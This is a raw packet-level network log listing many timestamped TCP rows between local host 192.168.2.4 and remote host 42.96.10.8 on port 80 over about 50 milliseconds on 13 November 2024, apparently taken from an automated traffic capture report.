                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893266916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893282890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893285990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893301964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893310070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893317938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893332958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893348932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893373966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893374920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893419027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893434048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893449068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893462896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893476963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893491983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893491983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893693924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893822908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893840075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893860102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893870115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893968105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.893992901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894170046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894227982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894243002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894258022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894288063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894299984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894309044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894331932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894334078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894371033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894393921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894411087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894437075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894442081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894460917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894476891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894491911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894501925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894509077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894526005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894534111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894543886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894551039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894561052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894577980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.894584894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.897562981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900181055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900218964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900250912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900268078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900286913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900296926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900305986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900327921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900356054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900356054 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900360107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900382996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900397062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900410891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900430918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900454998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900464058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900744915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900791883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900819063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900835037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900943041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900959015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900968075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900974989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.900990009 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901005983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901014090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901045084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901058912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901071072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901074886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901092052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901158094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901158094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901166916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901189089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901204109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901304007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901318073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901334047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901348114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901362896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901372910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901381016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901400089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901415110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901423931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901429892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901448011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901453972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901465893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901470900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901527882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901551962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901552916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901568890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901583910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901601076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901678085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901693106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901704073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901709080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901725054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901748896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901778936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901804924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901819944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901835918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901845932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901886940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901901960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901916981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901932955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901940107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901957035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.901995897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902033091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902049065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902072906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902087927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902102947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902117968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902124882 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902134895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902147055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902162075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902163029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902218103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902241945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902245045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902257919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902266026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902272940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902290106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902301073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902354002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902369022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902379036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902383089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902410030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902456999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902472019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902483940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902487993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902503967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902512074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902561903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902571917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902586937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902601957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902616978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902631998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902640104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902648926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902676105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902683973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902703047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902719021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902726889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902734041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902750969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902760029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902767897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902776957 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.902920008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903017998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903034925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903053045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903084993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903104067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903110027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903124094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903147936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903151035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903172016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903177023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903197050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903217077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903220892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903235912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903253078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903263092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903270006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903290987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903316975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903325081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903341055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903351068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903367996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903386116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903392076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903420925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903436899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903451920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903461933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903466940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903482914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903491020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903506994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903522968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903531075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903537989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903553963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903561115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903568029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903584003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903592110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903599977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903604031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903628111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903651953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903654099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903667927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903685093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903702974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903708935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903717041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903727055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903733015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903758049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903759956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903774023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903790951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903799057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903805971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903836012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903856039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903858900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903872967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903893948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903894901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903915882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903920889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903964996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.903990030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.904000044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.904017925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.904042959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944067955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944144964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944161892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944163084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944179058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944195986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944211960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944221973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944236994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944297075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944344997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944390059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944452047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944494009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944511890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944528103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944545031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944569111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944756985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944776058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944791079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944806099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944817066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944824934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944834948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944843054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944859982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944866896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.944921970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945209026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945226908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945242882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945257902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945275068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945297003 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945678949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945694923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945708990 CET804973342.96.10.8192.168.2.4
